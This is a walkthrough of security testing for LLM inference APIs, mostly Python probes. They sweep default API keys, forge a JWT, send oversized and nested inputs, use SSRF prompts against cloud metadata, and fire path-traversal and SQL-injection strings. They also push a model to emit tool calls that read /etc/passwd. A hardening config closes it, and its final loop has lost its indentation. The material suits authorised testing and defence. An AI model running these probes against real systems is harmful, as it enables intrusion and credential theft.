Inference Endpoint Exploitation
Exploiting inference API endpoints for unauthorized access, data exfiltration, and service abuse through authentication flaws, input validation gaps, and misconfigured permissions.
LLM inference endpoints expose model capabilities through APIs, typically REST or gRPC. These endpoints handle sensitive operations: they process user inputs, execute model inference, and may have access to internal tools, databases, or other services. Misconfigurations in authentication, authorization, input validation, and error handling can expose the underlying infrastructure to exploitation. This walkthrough covers systematic testing of inference endpoints for security weaknesses.
Step 1: Endpoint Discovery and Mapping
Before exploiting an endpoint, map its full API surface.
"""
Discover and map inference API endpoints.
"""
import requests
from dataclasses import dataclass, field
from typing import Optional
@dataclass
class EndpointInfo:
    """One discovered API endpoint and what the probe learned about it."""
    url: str                # path relative to the API base, e.g. "/v1/models"
    method: str             # HTTP verb used for the probe ("GET" or "POST")
    auth_required: bool     # True when the probe was answered with 401/403
    parameters: list[str]   # known request parameters (not filled in by discovery)
    response_format: str    # Content-Type header of the probe response
    notes: str = ""         # free text, e.g. endpoint description + status code
@dataclass
class APIMap:
    """Aggregated map of an inference API's discovered surface."""
    base_url: str                                            # target root URL
    endpoints: list[EndpointInfo] = field(default_factory=list)  # discovered endpoints
    auth_schemes: list[str] = field(default_factory=list)    # not populated by discover_endpoints
    version: Optional[str] = None                            # not populated by discover_endpoints
def discover_endpoints(base_url: str, headers: Optional[dict] = None) -> APIMap:
    """Probe common inference API endpoint patterns.

    Sends one request per well-known path and records every path that does
    not answer 404. A 401/403 answer is recorded as "exists, auth required".

    Args:
        base_url: Root URL of the target; a trailing slash is stripped.
        headers: Optional extra HTTP headers (e.g. auth) sent with every probe.

    Returns:
        APIMap listing the discovered endpoints. ``parameters`` is left empty
        and ``auth_schemes``/``version`` are not populated here.
    """
    api_map = APIMap(base_url=base_url)
    headers = headers or {}
    # Common inference endpoint paths: (path, method, description).
    # Covers OpenAI-compatible, Ollama-style, generic, and operational paths.
    COMMON_PATHS = [
        ("/v1/chat/completions", "POST", "OpenAI-compatible chat"),
        ("/v1/completions", "POST", "OpenAI-compatible completion"),
        ("/v1/embeddings", "POST", "Embedding generation"),
        ("/v1/models", "GET", "Model listing"),
        ("/v1/models/{model_id}", "GET", "Model details"),
        ("/api/generate", "POST", "Ollama-style generation"),
        ("/api/chat", "POST", "Ollama-style chat"),
        ("/api/tags", "GET", "Ollama model listing"),
        ("/predict", "POST", "Generic prediction endpoint"),
        ("/inference", "POST", "Generic inference endpoint"),
        ("/health", "GET", "Health check"),
        ("/metrics", "GET", "Prometheus metrics (may leak info)"),
        ("/docs", "GET", "API documentation (Swagger/OpenAPI)"),
        ("/openapi.json", "GET", "OpenAPI specification"),
        ("/redoc", "GET", "ReDoc documentation"),
    ]
    for path, method, description in COMMON_PATHS:
        url = f"{base_url.rstrip('/')}{path}"
        try:
            if method == "GET":
                resp = requests.get(url, headers=headers, timeout=5)
            else:
                # POST probes send an empty JSON body; a schema error still
                # proves the endpoint exists.
                resp = requests.post(url, headers=headers, json={}, timeout=5)
            # Anything but 404 counts as "endpoint present" (including 405/5xx).
            if resp.status_code != 404:
                auth_required = resp.status_code in (401, 403)
                api_map.endpoints.append(EndpointInfo(
                    url=path,
                    method=method,
                    auth_required=auth_required,
                    parameters=[],
                    response_format=resp.headers.get("content-type", "unknown"),
                    notes=f"{description} [{resp.status_code}]",
                ))
                print(f" Found: {method} {path} [{resp.status_code}]")
        except requests.exceptions.RequestException:
            # Unreachable/timed-out paths are silently skipped by design.
            pass
    return api_map
print("Endpoint discovery ready")
print("Call discover_endpoints() with a base URL")

Step 2: Authentication Testing
"""
Test inference endpoint authentication for common weaknesses.
"""
import requests
import jwt
import time
from dataclasses import dataclass
@dataclass
class AuthTestResult:
    """Outcome of a single authentication check."""
    test_name: str      # identifier of the check, e.g. "empty_api_key"
    passed: bool        # True when the endpoint rejected the attempt
    vulnerability: str  # short finding description, or "N/A" when passed
    details: str        # raw evidence: HTTP status or exception text
def test_authentication(base_url: str, valid_key: str = "") -> list[AuthTestResult]:
    """Test authentication mechanisms of an inference endpoint for weaknesses.

    Runs four checks against ``{base_url}/v1/chat/completions``:
      1. request with no credentials at all
      2. request with an empty bearer token
      3. requests with well-known default/test API keys
      4. request with a self-signed (forged) JWT

    Args:
        base_url: Root URL of the target API, without the chat path.
        valid_key: Currently unused; reserved for comparison checks that
            need a known-good credential.

    Returns:
        One AuthTestResult per completed check. The default-key sweep
        (Test 3) only records failures, i.e. keys that were accepted.
    """
    results = []
    endpoint = f"{base_url}/v1/chat/completions"
    # Minimal OpenAI-style body so a live server treats this as a real call.
    test_body = {
        "model": "test",
        "messages": [{"role": "user", "content": "test"}],
    }
    # Test 1: No authentication
    try:
        resp = requests.post(endpoint, json=test_body, timeout=10)
        # Fix: treat 403 as "auth enforced" too, consistent with Tests 2-4
        # below -- some gateways answer 403 (not 401) to anonymous requests,
        # and the original `!= 401` check falsely flagged those as open.
        no_auth = resp.status_code not in (401, 403)
        results.append(AuthTestResult(
            test_name="no_auth_required",
            passed=not no_auth,
            vulnerability="Endpoint accessible without authentication" if no_auth else "N/A",
            details=f"Status: {resp.status_code}",
        ))
    except Exception as e:
        # Unreachable endpoint: record as passed with the error for context.
        results.append(AuthTestResult("no_auth_required", True, "N/A", str(e)))
    # Test 2: Empty API key
    try:
        resp = requests.post(
            endpoint,
            json=test_body,
            headers={"Authorization": "Bearer "},
            timeout=10,
        )
        empty_key = resp.status_code not in (401, 403)
        results.append(AuthTestResult(
            test_name="empty_api_key",
            passed=not empty_key,
            vulnerability="Empty API key accepted" if empty_key else "N/A",
            details=f"Status: {resp.status_code}",
        ))
    except Exception as e:
        results.append(AuthTestResult("empty_api_key", True, "N/A", str(e)))
    # Test 3: Common default keys -- only accepted keys produce a result.
    DEFAULT_KEYS = [
        "sk-test", "test", "default", "admin", "api-key",
        "sk-000000000000000000000000",
        "EMPTY", "null", "undefined",
    ]
    for key in DEFAULT_KEYS:
        try:
            resp = requests.post(
                endpoint,
                json=test_body,
                headers={"Authorization": f"Bearer {key}"},
                timeout=5,
            )
            if resp.status_code not in (401, 403):
                results.append(AuthTestResult(
                    test_name=f"default_key_{key}",
                    passed=False,
                    vulnerability=f"Default/test key accepted: {key}",
                    details=f"Status: {resp.status_code}",
                ))
        except Exception:
            pass
    # Test 4: JWT without verification -- a token signed with an arbitrary
    # secret should never be accepted; acceptance implies the server skips
    # signature verification (or uses a guessable secret).
    try:
        fake_jwt = jwt.encode(
            {"sub": "admin", "exp": int(time.time()) + 3600},
            "fake_secret",
            algorithm="HS256",
        )
        resp = requests.post(
            endpoint,
            json=test_body,
            headers={"Authorization": f"Bearer {fake_jwt}"},
            timeout=10,
        )
        jwt_bypass = resp.status_code not in (401, 403)
        results.append(AuthTestResult(
            test_name="fake_jwt_token",
            passed=not jwt_bypass,
            vulnerability="Forged JWT token accepted" if jwt_bypass else "N/A",
            details=f"Status: {resp.status_code}",
        ))
    except Exception as e:
        results.append(AuthTestResult("fake_jwt_token", True, "N/A", str(e)))
    return results
print("Authentication testing ready")

Step 3: Input Validation Attacks
"""
Test input validation on inference endpoints for injection
and abuse vulnerabilities.
"""
import requests
import json
from dataclasses import dataclass
from typing import Optional
@dataclass
class InputValidationResult:
    """Outcome of a single input-validation probe."""
    test_name: str                 # identifier of the probe, e.g. "oversized_input"
    payload: str                   # human-readable summary of what was sent
    status_code: int               # HTTP status of the response (0 on exception)
    vulnerability_detected: bool   # True when the server accepted/leaked
    details: str                   # evidence or exception text
def test_input_validation(
    endpoint: str,
    headers: dict,
) -> list[InputValidationResult]:
    """Test input validation with various malformed and malicious inputs.

    Probes four classes of weakness against a chat-completions style
    endpoint: oversized input, deeply nested JSON, type confusion in the
    message schema, and SSRF-bait prompts.

    Args:
        endpoint: Full URL of the inference endpoint to probe.
        headers: HTTP headers (e.g. auth) sent with every request.

    Returns:
        One InputValidationResult per completed probe; probes that raise
        in the type-confusion/SSRF loops are skipped silently.
    """
    results = []
    # Test 1: Oversized input -- a server with no size limit accepts 1 MB.
    huge_input = "A" * 1_000_000
    try:
        resp = requests.post(endpoint, headers=headers, json={
            "model": "test",
            "messages": [{"role": "user", "content": huge_input}],
        }, timeout=30)
        results.append(InputValidationResult(
            test_name="oversized_input",
            payload=f"1MB string ({len(huge_input)} chars)",
            status_code=resp.status_code,
            vulnerability_detected=resp.status_code == 200,
            details="No input size limit" if resp.status_code == 200 else "Properly rejected",
        ))
    except Exception as e:
        results.append(InputValidationResult(
            "oversized_input", "1MB string", 0, False, str(e),
        ))
    # Test 2: Nested JSON (potential stack overflow in naive parsers).
    nested = {"role": "user", "content": "test"}
    for _ in range(100):
        nested = {"nested": nested}
    try:
        resp = requests.post(
            endpoint,
            # Fix: declare the JSON content type explicitly. The original
            # call sent the pre-serialized body via `data=` with no
            # Content-Type header, so servers rejected the request as
            # non-JSON before ever parsing the nested structure, which
            # invalidated the probe.
            headers={**headers, "Content-Type": "application/json"},
            data=json.dumps({"model": "test", "extra": nested}),
            timeout=10,
        )
        results.append(InputValidationResult(
            test_name="deeply_nested_json",
            payload="100-level nested JSON",
            status_code=resp.status_code,
            vulnerability_detected=resp.status_code == 200,
            details=f"Response: {resp.status_code}",
        ))
    except Exception as e:
        results.append(InputValidationResult(
            "deeply_nested_json", "nested", 0, False, str(e),
        ))
    # Test 3: Type confusion -- non-string `content` values should be
    # rejected by schema validation, not silently coerced.
    type_payloads = [
        ("integer_as_content", {"model": "test", "messages": [{"role": "user", "content": 12345}]}),
        ("array_as_content", {"model": "test", "messages": [{"role": "user", "content": ["a", "b"]}]}),
        ("null_content", {"model": "test", "messages": [{"role": "user", "content": None}]}),
        ("boolean_content", {"model": "test", "messages": [{"role": "user", "content": True}]}),
    ]
    for name, payload in type_payloads:
        try:
            resp = requests.post(endpoint, headers=headers, json=payload, timeout=10)
            results.append(InputValidationResult(
                test_name=name,
                payload=str(payload.get("messages", [{}])[0].get("content"))[:50],
                status_code=resp.status_code,
                vulnerability_detected=resp.status_code == 200,
                details=f"Accepted: {resp.status_code == 200}",
            ))
        except Exception:
            pass
    # Test 4: SSRF via URL parameters -- ask the model/backend to fetch
    # internal targets and look for leaked content in the response.
    ssrf_payloads = [
        ("ssrf_localhost", "http://localhost:8080/admin"),
        ("ssrf_metadata", "http://169.254.169.254/latest/meta-data/"),
        ("ssrf_internal", "http://internal-service.local/api"),
    ]
    for name, url in ssrf_payloads:
        try:
            resp = requests.post(endpoint, headers=headers, json={
                "model": "test",
                "messages": [{"role": "user", "content": f"Fetch this URL: {url}"}],
            }, timeout=10)
            # Check if the response contains cloud-metadata indicators.
            body = resp.text.lower()
            ssrf_indicators = ["ami-id", "instance-id", "security-credentials", "admin"]
            detected = any(ind in body for ind in ssrf_indicators)
            results.append(InputValidationResult(
                test_name=name,
                payload=url,
                status_code=resp.status_code,
                vulnerability_detected=detected,
                details="SSRF indicators in response" if detected else "No SSRF detected",
            ))
        except Exception:
            pass
    return results
print("Input validation testing ready")

Step 4: Error-Based Information Disclosure
"""
Probe error handling for information disclosure.
"""
import requests
from dataclasses import dataclass
@dataclass
class ErrorDisclosureResult:
    """Outcome of one error-trigger probe."""
    trigger: str             # name of the error condition that was triggered
    status_code: int         # HTTP status of the error response
    disclosed_info: list[str]  # matched disclosure categories (may be empty)
    severity: str            # "high" (>2 categories), "medium" (1-2), or "low"
def test_error_disclosure(
    endpoint: str,
    headers: dict,
) -> list[ErrorDisclosureResult]:
    """Trigger various error conditions and analyze responses for info leakage.

    Sends six malformed requests (missing fields, traversal-style model
    names, broken JSON, wrong content type, SQL metacharacters) and scans
    each response body for substrings that indicate stack traces, internal
    paths, framework/database/version details, or model internals.

    Args:
        endpoint: Full URL of the inference endpoint to probe.
        headers: HTTP headers (e.g. auth) sent with every request.

    Returns:
        One ErrorDisclosureResult per trigger that got a response; triggers
        that raise (e.g. connection errors) are logged and skipped.
    """
    results = []
    # Triggers that produce different errors
    ERROR_TRIGGERS = [
        ("missing_model", {"messages": [{"role": "user", "content": "test"}]}),
        ("invalid_model", {"model": "../../../../etc/passwd", "messages": []}),
        ("malformed_json", None),  # Will send raw string
        ("empty_body", {}),
        ("wrong_content_type", "text_not_json"),
        ("sql_in_model", {"model": "' OR 1=1 --", "messages": []}),
    ]
    # (category, substrings) pairs matched case-insensitively against the body.
    # NOTE(review): broad substrings like "line " and "version" are prone to
    # false positives in ordinary responses -- treat matches as leads, not proof.
    DISCLOSURE_INDICATORS = [
        ("stack_trace", ["traceback", "file \"", "line ", "exception"]),
        ("internal_path", ["/home/", "/app/", "/var/", "/opt/", "C:\\"]),
        ("framework_info", ["fastapi", "flask", "django", "uvicorn", "gunicorn"]),
        ("database_info", ["postgresql", "mysql", "sqlite", "mongodb"]),
        ("version_info", ["python", "torch", "transformers", "version"]),
        ("model_info", ["model_name", "model_path", "checkpoint", "weights"]),
    ]
    for trigger_name, payload in ERROR_TRIGGERS:
        try:
            if trigger_name == "malformed_json":
                # Raw, unparseable body -- exercises the JSON decoder's error path.
                resp = requests.post(
                    endpoint, headers=headers,
                    data="not json {{{",
                    timeout=10,
                )
            elif trigger_name == "wrong_content_type":
                # Valid-ish body, wrong declared content type.
                resp = requests.post(
                    endpoint,
                    headers={**headers, "Content-Type": "text/plain"},
                    data="test",
                    timeout=10,
                )
            else:
                resp = requests.post(
                    endpoint, headers=headers, json=payload, timeout=10,
                )
            body = resp.text.lower()
            disclosed = []
            for info_type, indicators in DISCLOSURE_INDICATORS:
                if any(ind in body for ind in indicators):
                    disclosed.append(info_type)
            # Severity scales with how many distinct categories leaked.
            severity = "high" if len(disclosed) > 2 else "medium" if disclosed else "low"
            results.append(ErrorDisclosureResult(
                trigger=trigger_name,
                status_code=resp.status_code,
                disclosed_info=disclosed,
                severity=severity,
            ))
            if disclosed:
                print(f" {trigger_name}: DISCLOSURE - {', '.join(disclosed)}")
            else:
                print(f" {trigger_name}: Clean error response [{resp.status_code}]")
        except Exception as e:
            # Failed trigger produces no result entry, only a log line.
            print(f" {trigger_name}: Error - {e}")
    return results
print("Error disclosure testing ready")

Step 5: Authorization and Access Control Testing
"""
Test authorization boundaries on inference endpoints.
"""
import requests
from dataclasses import dataclass
@dataclass
class AuthzTestResult:
    """Outcome of a single authorization-boundary check."""
    test_name: str        # identifier of the check, e.g. "admin_access_/debug"
    expected_access: bool  # whether a regular key should have access (False here)
    actual_access: bool   # whether access was actually granted
    vulnerability: str    # finding description, or "N/A"
def test_authorization(
    base_url: str,
    regular_key: str,
    admin_key: str = "",
) -> list[AuthzTestResult]:
    """Test authorization controls for privilege escalation.

    Using only the regular (non-admin) key, checks three boundaries:
    admin-path access, visibility of restricted models in the model
    listing, and access to fine-tuning job records.

    Args:
        base_url: Root URL of the target API.
        regular_key: Bearer token for a low-privilege account.
        admin_key: Currently unused -- presumably reserved for future
            differential (regular-vs-admin) checks; verify before relying on it.

    Returns:
        AuthzTestResult entries for findings (and for the fine-tuning check,
        which is always recorded when the endpoint answers 200).
    """
    results = []
    headers = {"Authorization": f"Bearer {regular_key}"}
    # Test 1: Access admin endpoints with regular key
    admin_paths = [
        "/admin", "/admin/models", "/admin/users",
        "/internal/config", "/debug", "/v1/admin/keys",
    ]
    for path in admin_paths:
        try:
            resp = requests.get(f"{base_url}{path}", headers=headers, timeout=5)
            # NOTE(review): any status outside 401/403/404 counts as access,
            # so 405/500 responses are flagged too -- confirm that is intended.
            has_access = resp.status_code not in (401, 403, 404)
            if has_access:
                results.append(AuthzTestResult(
                    test_name=f"admin_access_{path}",
                    expected_access=False,
                    actual_access=True,
                    vulnerability=f"Regular user can access {path}",
                ))
        except Exception:
            pass
    # Test 2: Model access control -- restricted models should not be listed
    # to a regular key.
    try:
        resp = requests.get(f"{base_url}/v1/models", headers=headers, timeout=10)
        if resp.status_code == 200:
            models = resp.json().get("data", [])
            model_ids = [m.get("id", "") for m in models]
            # Check if internal/restricted models are visible (by naming heuristic).
            restricted_indicators = ["internal", "private", "test", "staging"]
            exposed = [m for m in model_ids if any(r in m.lower() for r in restricted_indicators)]
            if exposed:
                results.append(AuthzTestResult(
                    test_name="restricted_model_exposure",
                    expected_access=False,
                    actual_access=True,
                    vulnerability=f"Restricted models visible: {exposed[:3]}",
                ))
    except Exception:
        pass
    # Test 3: Cross-tenant data access (if applicable) -- recorded even when
    # the job list is empty, with actual_access=False in that case.
    try:
        resp = requests.get(
            f"{base_url}/v1/fine-tuning/jobs",
            headers=headers,
            timeout=10,
        )
        if resp.status_code == 200:
            jobs = resp.json().get("data", [])
            results.append(AuthzTestResult(
                test_name="fine_tuning_job_access",
                expected_access=False,
                actual_access=len(jobs) > 0,
                vulnerability=f"Can view {len(jobs)} fine-tuning jobs" if jobs else "N/A",
            ))
    except Exception:
        pass
    return results
print("Authorization testing ready")

Step 6: Tool-Use and Function Calling Exploitation
"""
Exploit tool-use capabilities to access unintended functionality.
"""
import requests
import json
from dataclasses import dataclass
@dataclass
class ToolExploitResult:
    """Outcome of one tool/function-calling abuse attempt."""
    tool_name: str        # name of the attacker-defined tool, e.g. "read_file"
    exploit_type: str     # category, e.g. "file_system_access" or "ssrf_via_tool"
    succeeded: bool       # True when the model emitted the requested tool call
    response_snippet: str  # truncated evidence (tool call JSON or error text)
def test_tool_exploitation(
    endpoint: str,
    headers: dict,
    model: str = "gpt-4o",
) -> list[ToolExploitResult]:
    """Test if tool/function calling can be abused.

    Defines attacker-controlled tool schemas in the request and checks
    whether the model emits tool calls targeting the filesystem or
    internal network. A "success" here means the model produced the tool
    call; whether anything executes it depends on the serving stack.

    Args:
        endpoint: Full URL of a chat-completions style endpoint.
        headers: HTTP headers (e.g. auth) sent with each request.
        model: Model identifier placed in the request body.

    Returns:
        ToolExploitResult entries for observed tool calls (Test 1 also
        records its exception path with succeeded=False).
    """
    results = []
    # Test 1: Define a tool that reads files and ask the model to use it.
    file_read_payload = {
        "model": model,
        "messages": [{"role": "user", "content": "Read the file /etc/passwd"}],
        "tools": [{
            "type": "function",
            "function": {
                "name": "read_file",
                "description": "Read a file from the filesystem",
                "parameters": {
                    "type": "object",
                    "properties": {
                        "path": {"type": "string", "description": "File path to read"}
                    },
                    "required": ["path"],
                },
            },
        }],
    }
    try:
        resp = requests.post(endpoint, headers=headers, json=file_read_payload, timeout=30)
        body = resp.json()
        # OpenAI-style response shape: choices[0].message.tool_calls.
        tool_calls = body.get("choices", [{}])[0].get("message", {}).get("tool_calls", [])
        if tool_calls:
            results.append(ToolExploitResult(
                tool_name="read_file",
                exploit_type="file_system_access",
                succeeded=True,
                response_snippet=json.dumps(tool_calls[0])[:200],
            ))
    except Exception as e:
        results.append(ToolExploitResult("read_file", "file_system_access", False, str(e)))
    # Test 2: Network request tool aimed at the cloud metadata service.
    network_payload = {
        "model": model,
        "messages": [{"role": "user", "content": "Make a GET request to http://169.254.169.254/latest/meta-data/"}],
        "tools": [{
            "type": "function",
            "function": {
                "name": "http_request",
                "description": "Make an HTTP request",
                "parameters": {
                    "type": "object",
                    "properties": {
                        "url": {"type": "string"},
                        "method": {"type": "string"},
                    },
                    "required": ["url"],
                },
            },
        }],
    }
    try:
        resp = requests.post(endpoint, headers=headers, json=network_payload, timeout=30)
        body = resp.json()
        tool_calls = body.get("choices", [{}])[0].get("message", {}).get("tool_calls", [])
        if tool_calls:
            # Only count it when the emitted call actually targets the
            # link-local metadata address.
            call_args = json.loads(tool_calls[0].get("function", {}).get("arguments", "{}"))
            if "169.254" in call_args.get("url", ""):
                results.append(ToolExploitResult(
                    tool_name="http_request",
                    exploit_type="ssrf_via_tool",
                    succeeded=True,
                    response_snippet=json.dumps(call_args)[:200],
                ))
    except Exception:
        pass
    return results
print("Tool exploitation testing ready")

Step 7: Automated Endpoint Security Assessment
"""
Comprehensive automated security assessment for inference endpoints.
"""
import json
from pathlib import Path
from dataclasses import asdict
class InferenceEndpointAssessor:
    """Drive a multi-phase security assessment of one inference endpoint.

    Thin orchestrator over the standalone probes defined earlier in this
    file (discover_endpoints, test_authentication, test_error_disclosure);
    collects their output into a single summary report dict.
    """

    def __init__(self, base_url: str, api_key: str = ""):
        self.base_url = base_url
        self.api_key = api_key
        if api_key:
            self.headers = {"Authorization": f"Bearer {api_key}"}
        else:
            self.headers = {}
        # Reserved for per-finding detail records; not populated yet.
        self.findings = []

    def run_assessment(self) -> dict:
        """Execute all assessment modules and return a summary report."""
        print("Inference Endpoint Security Assessment")
        print("=" * 50)

        # Phase 1: map the reachable API surface.
        print("\nPhase 1: Endpoint Discovery")
        surface = discover_endpoints(self.base_url, self.headers)
        print(f" Found {len(surface.endpoints)} endpoints")

        # Phase 2: probe authentication weaknesses; keep only failures.
        print("\nPhase 2: Authentication Testing")
        auth_failures = [
            r for r in test_authentication(self.base_url, self.api_key)
            if not r.passed
        ]
        print(f" Found {len(auth_failures)} authentication issues")

        # Phase 3: look for information leaks in error responses.
        print("\nPhase 3: Error Disclosure Testing")
        chat_url = f"{self.base_url}/v1/chat/completions"
        leaks = [
            r for r in test_error_disclosure(chat_url, self.headers)
            if r.disclosed_info
        ]
        print(f" Found {len(leaks)} information disclosure issues")

        return {
            "target": self.base_url,
            "endpoints_found": len(surface.endpoints),
            "authentication_issues": len(auth_failures),
            "information_disclosures": len(leaks),
            "overall_risk": self._calculate_risk(auth_failures, leaks),
        }

    def _calculate_risk(self, auth_vulns, disclosures) -> str:
        # Auth bypass dominates; disclosures alone rate "high"; an exposed
        # but otherwise clean endpoint still carries a baseline of "medium".
        if auth_vulns:
            return "critical"
        return "high" if disclosures else "medium"
print("Endpoint assessment framework ready")

Step 8: Defensive Configuration Guide
"""
Secure inference endpoint configuration reference.
"""
# Reference hardening baseline for inference endpoints. Each top-level key
# maps one of the weakness classes probed earlier in this walkthrough to
# the corresponding defensive settings.
SECURE_CONFIG = {
    # Counters Step 2: require and rotate real credentials; validate JWTs
    # with an asymmetric algorithm instead of a shared secret.
    "authentication": {
        "require_api_key": True,
        "key_rotation_days": 90,
        "key_length_minimum": 32,
        "rate_limit_per_key": True,
        "jwt_validation": "RS256 with key rotation",
    },
    # Counters Step 3: bound size/depth and enforce strict schemas.
    "input_validation": {
        "max_input_tokens": 4096,
        "max_request_size_bytes": 1_048_576,
        "content_type_enforcement": True,
        "json_depth_limit": 10,
        "reject_unknown_fields": True,
    },
    # Counters Step 4: generic errors only; never echo internals.
    "error_handling": {
        "generic_error_messages": True,
        "no_stack_traces": True,
        "no_internal_paths": True,
        "structured_error_format": True,
    },
    # Counters SSRF and transport-level exposure (Steps 3 and 6).
    "network_security": {
        "tls_minimum": "1.2",
        "ssrf_protection": True,
        "internal_endpoint_isolation": True,
        "cors_restricted": True,
    },
    # Detection: make the probing in Steps 1-6 visible to defenders.
    "monitoring": {
        "log_all_requests": True,
        "anomaly_detection": True,
        "alert_on_auth_failures": True,
        "rate_limit_monitoring": True,
    },
}
print("Secure Inference Endpoint Configuration")
print("=" * 50)
for category, settings in SECURE_CONFIG.items():
print(f"\n{category.upper()}:")
for key, value in settings.items():
print(f" {key}: {value}")

Related Topics
- API Rate Limit Bypass -- Rate limiting testing
- API Enumeration for LLMs -- Endpoint discovery
- Model Fingerprinting Techniques -- Identifying backend models
Why are tool-use capabilities in LLM APIs a significant security concern for inference endpoints?